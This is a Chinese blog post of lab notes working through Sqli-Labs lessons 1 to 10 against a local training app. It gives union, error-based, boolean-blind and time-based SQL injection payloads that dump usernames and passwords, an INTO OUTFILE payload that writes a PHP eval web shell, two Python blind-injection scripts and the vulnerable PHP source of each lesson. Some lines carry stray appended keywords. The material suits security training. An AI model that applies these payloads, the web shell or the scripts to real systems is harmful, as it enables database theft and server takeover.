Sqli - Labs 靶場筆記(一)

時間 2021-01-29

標籤 php html mysql sql 數據庫 ide 測試 fetch url spa 欄目 PHP 简体版

原文原文鏈接

Less - 1：

頁面：

URL：php

http://127.0.0.1/sqli-labs-master/Less-1/html

測試：

1.回顯正常，說明不是數字型注入，mysql

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

2.回顯報錯，說明是字符型注入，sql

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'

3.回顯正常，單引號閉合成功，經過單引號閉合進行注入，數據庫

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' or '1'='1

4.經過逐個測試，得出字段數爲3，進行聯合注入，ide

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3--+ 
//回顯正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4--+
//報錯："Unknown column '4' in 'order clause'"

5.測試

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
//獲得能夠回顯的字段：2,3字段
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+
//獲得數據庫名爲security

6.查看全部數據庫名，fetch

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,
(select group_concat(schema_name) from information_schema.schemata),3 --+

7.查看security庫內的全部表名，url

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,
(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

8.爆出全部列名，以users爲例，spa

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,
(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

9.爆破用戶名和密碼，

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,
(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables 
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

補充：

查數據庫名：select database() information_schema.tables：存儲mysql數據庫下面的全部表名信息的表 table_schema：數據庫名 table_name：表名 column_name：列名 information_schema.columns ：存儲mysql數據庫下面的全部列名信息的表 table_name：表名

Less - 2：

頁面：

測試：

1.測試發現屬於數字型注入，不須要進行閉合，直接進行注入

2.payload：

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3
其餘步驟同Less-1

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 3：

頁面：

測試：

單引號與括號閉合

http://127.0.0.1/sqli-labs-master/Less-3/?id=1
//回顯正常

http://127.0.0.1/sqli-labs-master/Less-3/?id=1'
//You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
//回顯正常

源碼：

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

View Code

Less - 4：

測試：

雙引號和括號閉合

http://127.0.0.1/sqli-labs-master/Less-4/?id=1") --+
//閉合成功

http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3--+
//進行聯合注入

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $id = '"' . $id . '"'; $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 5：

測試：

http://127.0.0.1/sqli-labs-master/Less-5/?id=1
//回顯：You are in..........

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'
//回顯：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

法一：經過updatexml報錯注入：

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select database())),1))%23

法二：經過floor報錯注入：

①

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

②

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

③爆破錶名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

④爆破列名

http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23

⑤爆破username，password

http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 6：

測試：

方法同Less-5，不一樣之處爲雙引號。

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 7：

頁面：

http://127.0.0.1/sqli-labs-master/Less-7?id=1

測試：

http://127.0.0.1/sqli-labs-master/Less-7?id=1')) --+
//回顯正常

2.寫入文件

http://127.0.0.1/sqli-labs-master/Less-7?id=1')) union select 1,2,'<?PHP eval($_GET["s1mpL3"])?>' into outfile "E:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\7.php" %23

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 8：

待更新.......

測試：

http://127.0.0.1/sqli-labs-master/Less-8?id=1

有回顯

http://127.0.0.1/sqli-labs-master/Less-8?id=1'

無回顯，經過基於Bool的盲注。

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+

3.判斷數據庫名長度（依次測試）

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length(database())) = 8 --+

4.盲注得出數據庫名security

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+

5.判斷表名長度，

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

6.表4爲user，

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 9：

測試：

1.肯定爲基於時間的注入

http://127.0.0.1/sqli-labs-master/Less-9?id=1' and if(1=1,sleep(5),null) --+

2.判斷數據庫長度

http://127.0.0.1/sqli-labs-master/Less-9?
id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+

3.判斷庫名

http://127.0.0.1/sqli-labs-master/Less-9?
id=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(5), null) --+

參考：

腳本1：

# -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less-8/?id=1' def check(payload): url_new = url + payload time_start = time.time() content = requests.get(url=url_new) time_end = time.time() if time_end - time_start >5: return 1 result = '' s = r'0123456789abcdefghijklmnopqrstuvwxyz'
for i in xrange(1,100): for c in s: payload = "'and if(substr(database(),%d,1)='%c',sleep(5),1)--+" % (i,c) if check(payload): result += c break print result

腳本2：

# -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less-8/?id=1' def check(payload): url_new = url + payload time_start = time.time() content = requests.get(url=url_new) time_end = time.time() if time_end - time_start >5: return 1 result = '' panduan = '' ll=0 s = r'0123456789abcdefghijklmnopqrstuvwxyz'
for i in xrange(1,100): for c in s: payload = "'and if(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),%d,1)='%c',sleep(5),1)--+" % (i,c) if check(payload): result += c break
    if ll==len(result): print 'table_name: '+result end = raw_input('-------------') ll = len(result) print result

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

View Code

Less - 10：

測試：

同Less-9，不一樣之處是雙引號。

源碼：

<?php //including the Mysql connect parameters.
include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity 
 $id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);